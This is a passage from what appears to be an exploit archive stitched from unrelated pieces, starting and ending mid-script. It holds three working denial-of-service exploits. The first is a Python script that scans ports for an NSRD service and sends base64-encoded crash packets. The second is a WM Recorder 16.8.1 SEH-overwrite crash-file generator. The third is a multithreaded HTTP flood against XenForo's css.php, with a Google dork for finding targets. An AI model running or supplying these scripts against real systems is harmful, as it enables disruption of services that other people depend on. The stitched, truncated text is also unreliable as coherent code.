TW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAAB
AAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZw
ZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAA
AAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1
bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAA
AAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3Zl
cnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAA
AAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkA
AAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEA
AAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUA
AAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAA
AAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAA
AAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAA
BGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24A
AAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAI
b3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAA
AAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRo
bHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAA
AAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5h
bWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAA
AQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAA
AAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAAB
AAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0
b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEA
AAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgA
AAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01v
bnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QA
AAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAA
BG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAA
AAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAAB
cwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUA
AAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAA
AAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAA
AAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9u
dGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAA
B01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJp
b2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAAB
AAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwA
AAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEA
AAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJp
ZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAA
AQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAA
AAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAF
TW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAAB
AAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZw
ZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAA
AAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1
bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAA
AAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3Zl
cnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAA
AAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkA
AAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEA
AAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUA
AAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAA
AAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAA
AAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAA
BGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24A
AAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAI
b3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAA
AAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRo
bHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAA
AAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5h
bWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAA
AQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAA
AAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAAB
AAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0
eXBlAAAAAQAAAAxOU1Igc2NoZWR1bGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA="""
part2 = """gAABBEoWuaoAAAAAAAAAAgAF890AAAACAAAAaAAAdT0AAAAIAAAAAgAAAGgAAHU9AAAACAAAAAFa
FWVkdWxlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIABfPdAAAAAgAAAGgAAHU9AAAACAAAAAFa
FWVkdWxlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="""
hello = """gAACuFkQrJUAAAAAAAAAAgAF89cAAAACAAAAfAAAAAEAAAAgWhbtaAAAAAdhYWFhYWFhAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAduc3JzdGF0AAAAAAFaFu1oWhbtaAAAAANuaXMAAAAABihub25lKQAAAAAAAAAAAAdhYWFhYWFhAAAAAAAAAAAEcm9vdAAAAAEAAAAEcm9vdAAAAAEAAAALYXV0aCBzZXJ2ZXIAAAAAAQAAAA0xMTEuMTExLjEuMTExAAAAAAAAAAAAAAEAAAAIaG9zdG5hbWUAAAABAAAADTExMS4xMTEuMS4xMTEAAAAAAAAAAAAAAQAAAAZsb2NhbGUAAAAAAAEAAAEYTENfQ1RZUEU9ZW5fVVMuVVRGLTg7TENfTlVNRVJJQz1wbF9QTC5VVEYtODtMQ19USU1FPXBsX1BMLlVURi04O0xDX0NPTExBVEU9ZW5fVVMuVVRGLTg7TENfTU9ORVRBUlk9cGxfUEwuVVRGLTg7TENfTUVTU0FHRVM9ZW5fVVMuVVRGLTg7TENfUEFQRVI9cGxfUEwuVVRGLTg7TENfTkFNRT1lbl9VUy5VVEYtODtMQ19BRERSRVNTPWVuX1VTLlVURi04O0xDX1RFTEVQSE9ORT1lbl9VUy5VVEYtODtMQ19NRUFTVVJFTUVOVD1wbF9QTC5VVEYtODtMQ19JREVOVElGSUNBVElPTj1lbl9VUy5VVEYtOAAAAAAAAAABAAAADUxvY2FsT1NfQWRtaW4AAAAAAAABAAAAA1llcwAAAAAAAAAAAQAAABJPTkMgcHJvZ3JhbSBudW1iZXIAAAAAAAEAAAAGMzkwMTA5AAAAAAAAAAAAAQAAABJPTkMgdmVyc2lvbiBudW1iZXIAAAAAAAEAAAABMgAAAAAAAAAAAAAAAAAAAAo="""
res = ''
if nsrd_port == 0:
for i in range(7000,10000):
try:
sys.stdout.write('.')
s = socket.socket()
s.connect((nsrd_addr, i))
s.send(base64.b64decode(hello))
res = s.recv(4096)
if '111.111.1.111' in res:
print "\n\033[31m[!] NSRD FOUND ON PORT: %d\033[0m" % i
nsrd_port = i
s.close()
break
s.close()
except Exception:
pass
print "\n[!] SENDING DOS PACKETS"
s = socket.socket()
s.connect((nsrd_addr, nsrd_port))
s.send(base64.b64decode(part1))
s.recv(256)
s.close()
time.sleep(1)
s = socket.socket()
s.connect((nsrd_addr, nsrd_port))
s.send(base64.b64decode(part2))
s.recv(256)
s.close()
print "\nDONE."
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: WM Recorder 16.8.1 - Denial of Service
# Date: 03-20-2018
# Vulnerable Software: WM Recorder 16.8.1
# Vendor Homepage: http://wmrecorder.com/home/
# Version: 16.8.1
# Software Link: http://wmrecorder.com/download/wm-recorder/
# Tested On: Windows 7 x86/x64, Windows 10 x64
#
#
# PoC: generate crash.txt, open app, go to Schedule Recordings, Open Scheduler, paste crash.txt contents in Stream URL, File name and Website URL,
# change End Recording date to future date, turn scheduler on, select OK
#
# app crashes & EIP overwrite;
# !mona seh > no ppr pointers & !mona seh -all > all aslr/safeseh
# lots of bad chars including \x90
#
filename="crash.txt"
junk = "\x41"*429
nseh = "\x42"*4
seh = "\x43"*4
fill = "\x44"*9562
buffer = junk + nseh + seh + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
# Exploit Title: XenForo CSS Loader DoS
# Google Dork: intext:"Forum software by XenForo™" inurl:css.php ext:php
# Date: 22-03-18
# Exploit Author: LockedByte
# Vendor Homepage: https://xenforo.com/
# Software Link: https://xenforo.com/help/installation/
# Version: XenForo 2
# Tested on: Linux
# 0==================== { Exploit PoC } ====================0
import requests
import sys
import threading
import random
import re
import argparse
host=''
headers_useragents=[]
request_counter=0
printedMsgs = []
def printMsg(msg):
if msg not in printedMsgs:
print "\n"+msg + " after %i requests" % request_counter
printedMsgs.append(msg)
def useragent_list():
global headers_useragents
headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
return(headers_useragents)
def randomString(size):
out_str = ''
for i in range(0, size):
a = random.randint(65, 90)
out_str += chr(a)
return(out_str)
def initHeaders():
useragent_list()
global headers_useragents, additionalHeaders
headers = {
'User-Agent': random.choice(headers_useragents),
'Cache-Control': 'no-cache',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Referer': 'http://www.google.com/?q=' + randomString(random.randint(5,10)),
'Keep-Alive': str(random.randint(110,120)),
'Connection': 'keep-alive'
}
if additionalHeaders:
for header in additionalHeaders:
headers.update({header.split(":")[0]:header.split(":")[1]})
return headers
def handleStatusCodes(status_code):
global request_counter
sys.stdout.write("\r%i requests has been sent" % request_counter)
sys.stdout.flush()
if status_code == 429:
printMsg("You have been throttled")
if status_code == 500:
printedMsg("Status code 500 received")
def sendGET(url):
global request_counter
headers = initHeaders()
try:
request_counter+=1
request = requests.get(url, headers=headers)
# print 'her'
handleStatusCodes(request.status_code)
except:
pass
def sendPOST(url, payload):
global request_counter
headers = initHeaders()
try:
request_counter+=1
if payload:
request = requests.post(url, data=payload, headers=headers)
else:
request = requests.post(url, headers=headers)
handleStatusCodes(request.status_code)
except:
pass
class SendGETThread(threading.Thread):
def run(self):
try:
while True:
global url
sendGET(url)
except:
pass
class SendPOSTThread(threading.Thread):
def run(self):
try:
while True:
global url, payload
sendPOST(url, payload)
except:
pass
# TODO:
# check if the site stop responding and alert
def main(argv):
parser = argparse.ArgumentParser(description='XenForo CSS Load DoS Exploit PoC. By LockedByte \n Common Usage: python poc.py -u domain.com -c /css.php -t 500')
parser.add_argument('-u', help='Target Domain. Usage: -u \'<domain>\'')
parser.add_argument('-c', help='CSS Loader (/css.php) Path. Usage: -c \'<path>\'')
parser.add_argument('-p', help='Use this only if the PHP file use POST Requests. PHP POST URL. Usage: -p \'<url>\'')
parser.add_argument('-d', help='Use this only if the PHP file use POST Requests. POST DATA.', default=None)
parser.add_argument('-ah', help='Use this only if you want to use different CSS Loads. Additional headers. Usage: -ah \'Content-type: application/json\' \'User-Agent: Doser\'', default=None, nargs='*')
parser.add_argument('-t', help='Number of threads to be used', default=500, type=int)
args = parser.parse_args()
global url, payload, additionalHeaders
additionalHeaders = args.ah
payload = args.d
if args.u:
url = 'http://' + args.u + args.c + '?css=xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_M